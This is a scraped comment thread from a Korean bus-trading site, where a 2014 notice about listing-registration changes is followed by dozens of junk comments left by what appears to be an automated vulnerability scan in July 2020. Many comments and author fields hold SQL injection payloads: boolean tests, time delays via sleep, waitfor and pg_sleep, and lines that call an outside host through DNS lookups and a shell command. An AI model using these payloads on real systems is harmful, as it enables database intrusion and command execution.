버스/승합차 직거래 사이트! 버스4989 에 오신 것을 환영합니다.

아이디

비밀번호

 

 

 

 

 

글  쓴  이

   관리자

조  회  수

132901

제       목

   매물등록 변경사항 안내.

등  록  일

14/04/16

 

 

안녕하십니까?
트럭4989 관리팀입니다.


1. 매물 등록 시 필수 입력사항이 추가되었습니다.
매물 등록 시 첫 번째 줄 판매 옵션은 필수 사항 입니다. 선택하지 않을 경우 매물 등록이 되지 않습니다.

2. 보안번호가 기존 숫자만 입력하는 시스템에서 문자도 추가되었습니다.

사이트 보안을 위한 변경 내용입니다. 불편하시더라도 양해 부탁드립니다.




※ 만약 매물등록이 되지 않으면

1. 사진 크기의 사이즈를 확인해주세요.

2. 필수입력사항이 빠졌는지 확인해주세요.

3. 경고창 메시지를 잘 읽어 보신뒤 확인해 주시고 그래도 매물등록이 안되면 트럭4989 쪽으로 연락 주시기 바랍니다.

감사합니다.

 

IP Address : 112.158.245.4

 

 

* 등록자 : 김정우   등록일: 2020-07-06 13:42:01   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:37   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:37   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:38   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:38   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:39   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:39   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:40   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:40   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:41   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:42   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:42   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:43   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:43   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:44   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:44   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:45   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:18:45   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:04   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:05   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:05   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:06   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:07   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:07   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:20:08   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:18   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:19   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:19   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:20   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:21   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:21   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:22   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:35   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:35   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:36   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:37   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:37   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:38   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:39   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:39   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:40   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:40   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:41   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:41   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:42   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:42   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:43   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:43   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:21:44   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:15   

1'"

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:16   

\

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:16   

1위웬%2527%2522

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:17   

@@2mUIu

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:17   

JyI=

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:18   

'"

 

* 등록자 : 김정우   등록일: 2020-07-06 14:22:18   

''""

 

* 등록자 : 1'"   등록일: 2020-07-06 14:23:22   

1

 

* 등록자 : \   등록일: 2020-07-06 14:23:22   

1

 

* 등록자 : 1위웬%2527%2522   등록일: 2020-07-06 14:23:23   

1

 

* 등록자 : @@plann   등록일: 2020-07-06 14:23:24   

1

 

* 등록자 : JyI=   등록일: 2020-07-06 14:23:24   

1

 

* 등록자 : '"   등록일: 2020-07-06 14:23:25   

1

 

* 등록자 : ''""   등록일: 2020-07-06 14:23:25   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:57   

-1 OR 2+798-798-1=0+0+0+1 --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:58   

-1 OR 2+801-801-1=0+0+0+1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:58   

-1' OR 2+296-296-1=0+0+0+1 --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:59   

-1' OR 2+771-771-1=0+0+0+1 or 'XZmUDYmL'='

 

* 등록자 : 김정우   등록일: 2020-07-06 14:23:59   

-1" OR 2+667-667-1=0+0+0+1 --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:00   

if(now()=sysdate(),sleep(14),0)/*'XOR(if(now()=sysdate(),sleep(14),0))OR'"XOR(if(now()=sysdate(),sleep(14),0))OR"*/

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:00   

(select(0)from(select(sleep(21)))v)/*'+(select(0)from(select(sleep(21)))v)+'"+(select(0)from(select(sleep(21)))v)+"*/

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:01   

-1; waitfor delay '0:0:21' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:01   

-1); waitfor delay '0:0:21' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:02   

1 waitfor delay '0:0:7' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:02   

0NRCobNx'; waitfor delay '0:0:7' --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:03   

-1;select pg_sleep(7); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:03   

-1);select pg_sleep(14); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:04   

-1));select pg_sleep(14); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:04   

SLovm37r';select pg_sleep(21); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:05   

kWbhu7lW');select pg_sleep(21); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:06   

BJr1BgAN'));select pg_sleep(7); --

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:06   

1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.3171-1443.3171.d8861.1.bxss'||'.me')

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:07   

'||UTL_INADDR.get_host_address('dns.'||'sqli.013405.3171-1444.3171.d8861.1.bxss'||'.me')||'

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:07   

1;copy (select '') to program 'nslookup dns.sqli.\013405.3171-1445.3171.d8861.\1.bxss.me'

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:08   

1';copy (select '') to program 'nslookup dns.sqli.\013405.3171-1446.3171.d8861.\1.bxss.me

 

* 등록자 : 김정우   등록일: 2020-07-06 14:24:08   

630'

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:31   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:31   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:32   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:32   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:33   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:33   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:26:34   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:27:13   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:27:13   

1

 

* 등록자 : -1 OR 2+50-50-1=0+0+   등록일: 2020-07-06 14:27:14   

1

 

* 등록자 : -1 OR 2+29-29-1=0+0+   등록일: 2020-07-06 14:27:15   

1

 

* 등록자 : -1' OR 2+582-582-1=0   등록일: 2020-07-06 14:27:15   

1

 

* 등록자 : -1' OR 2+638-638-1=0   등록일: 2020-07-06 14:27:16   

1

 

* 등록자 : -1" OR 2+900-900-1=0   등록일: 2020-07-06 14:27:16   

1

 

* 등록자 : if(now()=sysdate(),s   등록일: 2020-07-06 14:27:17   

1

 

* 등록자 : (select(0)from(selec   등록일: 2020-07-06 14:27:17   

1

 

* 등록자 : 1 waitfor delay '0:0   등록일: 2020-07-06 14:27:18   

1

 

* 등록자 : EqBk5Fhz'; waitfor d   등록일: 2020-07-06 14:27:18   

1

 

* 등록자 : r3spmqF7';select pg_   등록일: 2020-07-06 14:27:19   

1

 

* 등록자 : GDxsFrHT');select pg   등록일: 2020-07-06 14:27:19   

1

 

* 등록자 : ES0ILGMu'));select p   등록일: 2020-07-06 14:27:20   

1

 

* 등록자 : '||UTL_INADDR.get_ho   등록일: 2020-07-06 14:27:20   

1

 

* 등록자 : 김정우';copy (select   등록일: 2020-07-06 14:27:21   

1

 

* 등록자 : 898'   등록일: 2020-07-06 14:27:21   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:32:28   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:32:29   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:56   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:57   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:57   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:58   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:58   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:59   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:34:59   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:00   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:00   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:01   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:02   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:02   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:03   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:03   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:04   

1

 

* 등록자 : 김정우   등록일: 2020-07-06 14:35:04   

1

 

 

 

글쓰기


 

 

 

 

 

버스4989 소개 | 버스4989 광고안내 | 회원약관 | 개인정보취급방침 | 이메일무단수집거부 | 제휴문의 | 고객센터

 

소 재  / 상 호

:

인천광역시 남구 미추홀대로 637 2층 (우)22155  버스4989  / 대 표 : 조 호 경

관    리     자

:

조호선 과장  

버스4989 회원 이메일주소 무단수집거부

대  표  전  화

:

010-2556-4000

 FAX : 070-8259-2243  

TRUCKS@NATE.COM

소            개

:

버스4989는 인터넷 트럭직거래 및 검색사이트로써 트럭을 직접 매매하지 않습니다 

버스4989의 모든 이미지&제작기법은 저작권자 허락없이 무단 사용할 경우 저작권법에 의해 처벌됩니다.

COPYRIGHT BY  BUS4989.NET  &  버스4989    2006. 03   ALL RIGHT RESERVED